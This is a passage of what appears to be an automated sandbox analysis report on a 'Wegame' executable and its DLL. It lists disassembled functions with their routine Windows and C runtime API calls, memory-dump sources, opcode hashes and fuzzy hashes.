                                                                • Opcode ID: 33d7f6560ed9b567fcb6baa78f68b4d2aefe8860636929c4640156a7a3f57bc8
                                                                • Instruction ID: d68620e33f65fb6ca5d55a50194f59cfe51f90d0883a1277af043a3bc692b35d
                                                                • Opcode Fuzzy Hash: 33d7f6560ed9b567fcb6baa78f68b4d2aefe8860636929c4640156a7a3f57bc8
                                                                • Instruction Fuzzy Hash: 9EF03C7091122ADFDB01CFA889404ADBBB1BF19710B60C4BEE9049B261C7788A10EB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004568B1 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 004568B8
                                                                  • Part of subcall function 004532C0: __EH_prolog3.LIBCMT ref: 004532C7
                                                                  • Part of subcall function 00456817: __EH_prolog3.LIBCMT ref: 0045681E
                                                                  • Part of subcall function 00456817: _CxxThrowException.VCRUNTIME140(?,0049C288,?,00000054,?,0049C1AC,?,00000054,004568B0,00000000,?,?,00000030,00453EC0,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s), ref: 00456849
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$ExceptionThrow
                                                                • String ID:
                                                                • API String ID: 2323905274-0
                                                                • Opcode ID: 95a2e7b75dd3f24375c1c6c96b6e09c2f0823df2eda1ea427766558365546fde
                                                                • Instruction ID: 01f51ccb7d3c390e38c57f3e7afcfce6fdef03b332b7480e6f8aea583c7bc8c1
                                                                • Opcode Fuzzy Hash: 95a2e7b75dd3f24375c1c6c96b6e09c2f0823df2eda1ea427766558365546fde
                                                                • Instruction Fuzzy Hash: CDF03070D0020A7BDF10BFF2CC86DAE36699F04359F40840EB91073153ED3D9A188AA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD442D7 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD442DE
                                                                  • Part of subcall function 6BD42B73: __EH_prolog3.LIBCMT ref: 6BD42B7A
                                                                  • Part of subcall function 6BD44233: __EH_prolog3.LIBCMT ref: 6BD4423A
                                                                  • Part of subcall function 6BD44233: _CxxThrowException.VCRUNTIME140(?,6C044AE4,?,00000054,?,6C044B6C,?,000000B4,6BD442D6,00000000), ref: 6BD44265
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$ExceptionThrow
                                                                • String ID:
                                                                • API String ID: 2323905274-0
                                                                • Opcode ID: 22693f47ba814957a47a655d8f65a396a4a9129cdbe19691e2fe80b52bb23df8
                                                                • Instruction ID: 7e2e0993b05658499e222b1d24a5c58850f717460f26869589bced6758a366eb
                                                                • Opcode Fuzzy Hash: 22693f47ba814957a47a655d8f65a396a4a9129cdbe19691e2fe80b52bb23df8
                                                                • Instruction Fuzzy Hash: 0CF054B1C1820A77CF159FB0DC46E9F766DAF18268F104425B8006B151DF3D8F518B70
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD0A3A0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BD162D8,00000000,6BD16649,00000003,1F5A0D44,?,?,00000000,6BF764F4,000000FF,?,6BD15B05,00000000), ref: 6BD0A3E5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                • String ID:
                                                                • API String ID: 3668304517-0
                                                                • Opcode ID: 9db1139341ee71beaf4eadc5676e0ca240d293114d984be1f9c792ddeb399716
                                                                • Instruction ID: 6a4379d2ee23207220dab1f69b7300e7a86626f77b9201b20968502be1a5df7f
                                                                • Opcode Fuzzy Hash: 9db1139341ee71beaf4eadc5676e0ca240d293114d984be1f9c792ddeb399716
                                                                • Instruction Fuzzy Hash: 0AE09B715245014FE33C8F68E89475EB6A69F41325F240F5CE081CBED1DB7C99854755
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BE24196 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?shutdown@Application@common@ierd_tgp@@EAEXXZ.COMMON(6C062590,00000010,6BD09278,00000004,00000004,00000003,6BD08EC0,6BD08ED0,-00000002,000000D5), ref: 6BE241B5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?shutdown@Application@common@ierd_tgp@@
                                                                • String ID:
                                                                • API String ID: 3896587232-0
                                                                • Opcode ID: 99b116bc64c491225551b0053b57dbccf84d436cdc8efed930eedb47d0f5764d
                                                                • Instruction ID: 2eb6fe376593ea7bad5aaedbb47dda415d37a63a945640ab75ba4f46172aa89c
                                                                • Opcode Fuzzy Hash: 99b116bc64c491225551b0053b57dbccf84d436cdc8efed930eedb47d0f5764d
                                                                • Instruction Fuzzy Hash: 6EF09A76A00349CFCB00CFA8C9826DDBBB1FF54319F20452FD92667281CB349A11CB64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD398AE Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD398B3
                                                                  • Part of subcall function 6BD362B7: __EH_prolog3.LIBCMT ref: 6BD362BE
                                                                  • Part of subcall function 6BD3C3AB: __EH_prolog3.LIBCMT ref: 6BD3C3B2
                                                                  • Part of subcall function 6BD3B752: __EH_prolog3.LIBCMT ref: 6BD3B759
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$H_prolog3_
                                                                • String ID:
                                                                • API String ID: 4240126716-0
                                                                • Opcode ID: c79d234b7baacce58b4d7c0154c86375c2f8eef7bc8d35077d29384e9c28bf6f
                                                                • Instruction ID: 918c33bc8ac0a91889b70ca069a828416f09c2cd6f27574cbe5ed72dcbfa6737
                                                                • Opcode Fuzzy Hash: c79d234b7baacce58b4d7c0154c86375c2f8eef7bc8d35077d29384e9c28bf6f
                                                                • Instruction Fuzzy Hash: A3F037B181062C8BCF11EF60CC81BDDB735BF11318F1088E99A192B151DBB85BC88FA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD27457 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD2745E
                                                                  • Part of subcall function 6BD260AA: __EH_prolog3_GS.LIBCMT ref: 6BD260B1
                                                                  • Part of subcall function 6BD260AA: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000040,00000034,6BD27474,0000001C,6BD259BA,?,?,?,000000D4,6BD24672,?,?), ref: 6BD260C6
                                                                  • Part of subcall function 6BD273A9: __EH_prolog3_GS.LIBCMT ref: 6BD273B0
                                                                  • Part of subcall function 6BD273A9: CryptGenRandom.ADVAPI32(?,?,?,00000034,6BD27489,?,00000010,0000001C,6BD259BA,?,?,?,000000D4,6BD24672,?,?), ref: 6BD273BE
                                                                  • Part of subcall function 6BD26642: CryptReleaseContext.ADVAPI32(00000000,00000000,1F5A0D44,00000000,00000000,6BF78BD3,000000FF,?,6BD274A8,?,00000010,0000001C,6BD259BA,?,?,?), ref: 6BD26675
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CryptH_prolog3_$Context$AcquireRandomRelease
                                                                • String ID:
                                                                • API String ID: 3909388945-0
                                                                • Opcode ID: 88467664f26c7733667c03df3a97ba304c8011a073721bc086ec329b6ecfd774
                                                                • Instruction ID: 4ecf5c442f9323bbfd13525e59c8c2bb99de7fb39def3acd3d5b9a78e356cc25
                                                                • Opcode Fuzzy Hash: 88467664f26c7733667c03df3a97ba304c8011a073721bc086ec329b6ecfd774
                                                                • Instruction Fuzzy Hash: 67F03A329002489BCF15DFB0C946ADD73B9AF08368F6041A9E611BF190DB7A9F059B64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD5F62A Relevance: 1.5, APIs: 1, Instructions: 28timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 6BD5F657
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: TimerWaitable
                                                                • String ID:
                                                                • API String ID: 1823812067-0
                                                                • Opcode ID: 81aaa0f96d061ab926adb97f7d3e87c2c457a34f1effd6a0990a0a39e6c4b45d
                                                                • Instruction ID: 6728e61924479bad628ffb7830d9f94cfe24c591de769ac33cfa122921e0b10f
                                                                • Opcode Fuzzy Hash: 81aaa0f96d061ab926adb97f7d3e87c2c457a34f1effd6a0990a0a39e6c4b45d
                                                                • Instruction Fuzzy Hash: 74E0C97180102DBF9F50EFA5C849CDF7FBCEF056A4B004556B5099B150C6309655CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD336E7 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3
                                                                • String ID:
                                                                • API String ID: 431132790-0
                                                                • Opcode ID: 8bca5b145f1c05452d2650aa230719ecd054703a26aed474cdc1b5ea716789db
                                                                • Instruction ID: 6f10171660fc0bb216756e4cc618920254255a5e7a20f312f174432d77842227
                                                                • Opcode Fuzzy Hash: 8bca5b145f1c05452d2650aa230719ecd054703a26aed474cdc1b5ea716789db
                                                                • Instruction Fuzzy Hash: CEF012B5C10209CBEF01DFA8C8027EEBBB1BF15329F140428E8006A241D7BA9A549BA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00443502 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3
                                                                • String ID:
                                                                • API String ID: 431132790-0
                                                                • Opcode ID: 44f6daf8e5080861ce83b8d5fb6f192bd74ffded88f204376191761f79b10ff0
                                                                • Instruction ID: 42ac9ae89068dc4879206b44f24e272fc99addd5cdea2396863d527d66efebe7
                                                                • Opcode Fuzzy Hash: 44f6daf8e5080861ce83b8d5fb6f192bd74ffded88f204376191761f79b10ff0
                                                                • Instruction Fuzzy Hash: B0F03A78600249EFCB11DF69C94498E7BF1FF08319F10855EF5548B251C775DA11CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD447CC Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3
                                                                • String ID:
                                                                • API String ID: 431132790-0
                                                                • Opcode ID: 461d0e59e4d931a84ffc1196125caf984f1b72b3810b75fad93ba94051a13a69
                                                                • Instruction ID: c76a81518d83f2dbe362917a6ed8c16710143e9d170a7b37eb1f6c7a46b25b0b
                                                                • Opcode Fuzzy Hash: 461d0e59e4d931a84ffc1196125caf984f1b72b3810b75fad93ba94051a13a69
                                                                • Instruction Fuzzy Hash: 8FF06775610204DFCB11CF68C544A8A7BB1BF09314F10856DE5508B2A0C376DA11DFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD2E4EB Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 6BD2E0AF: __EH_prolog3_GS.LIBCMT ref: 6BD2E0B6
                                                                  • Part of subcall function 6BD2E0AF: CreateEventA.KERNEL32(00000000,7622DF20,00000000,00000000,00000030,6BD2E4FC,00000000,00000000,?,6BD31BDC,?,?,00000000,7622DF20,?), ref: 6BD2E0C7
                                                                • FindCloseChangeNotification.KERNEL32(00000000,?,6BD31BDC,?,?,00000000,7622DF20,?,?,6BE25CF7,1F5A0D44,00000000,7622DF20,?,?,6BF9AEF0), ref: 6BD2E50F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ChangeCloseCreateEventFindH_prolog3_Notification
                                                                • String ID:
                                                                • API String ID: 91177929-0
                                                                • Opcode ID: 82a587df5b5922926858ee6076565cfbd8e81984a2d4595fb62fb013c62c3fa4
                                                                • Instruction ID: 425ba6fb6831cf36f6b15865aaed7f0793a439bcc9aebabfe5c7e053dae367cb
                                                                • Opcode Fuzzy Hash: 82a587df5b5922926858ee6076565cfbd8e81984a2d4595fb62fb013c62c3fa4
                                                                • Instruction Fuzzy Hash: 96E08C3AB281208B9B189B3D7C0045623D99BC472832584ACFE44DB308EA34CD4246D0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BE35D00 Relevance: 1.5, APIs: 1, Instructions: 23networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • socket.WS2_32(00000017,00000002,00000000), ref: 6BE35D10
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: socket
                                                                • String ID:
                                                                • API String ID: 98920635-0
                                                                • Opcode ID: cec72f173bfac01385976f052f2d991271d4984ebee124999aec1b043d4d8a7e
                                                                • Instruction ID: 5551000e3cd77a3becdeaf95955679fbe40ba550c5ba5f27f4abb36a58e0cc8a
                                                                • Opcode Fuzzy Hash: cec72f173bfac01385976f052f2d991271d4984ebee124999aec1b043d4d8a7e
                                                                • Instruction Fuzzy Hash: 7BE086707522205EFF006F398D06B463AB59B03775F70C710F628DA2D1DB75C8188B01
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD31650 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD31657
                                                                  • Part of subcall function 6BD254B1: __EH_prolog3.LIBCMT ref: 6BD254B8
                                                                  • Part of subcall function 6BD31E4A: __EH_prolog3_GS.LIBCMT ref: 6BD31E51
                                                                  • Part of subcall function 6BD31E4A: GetTickCount.KERNEL32 ref: 6BD31E98
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
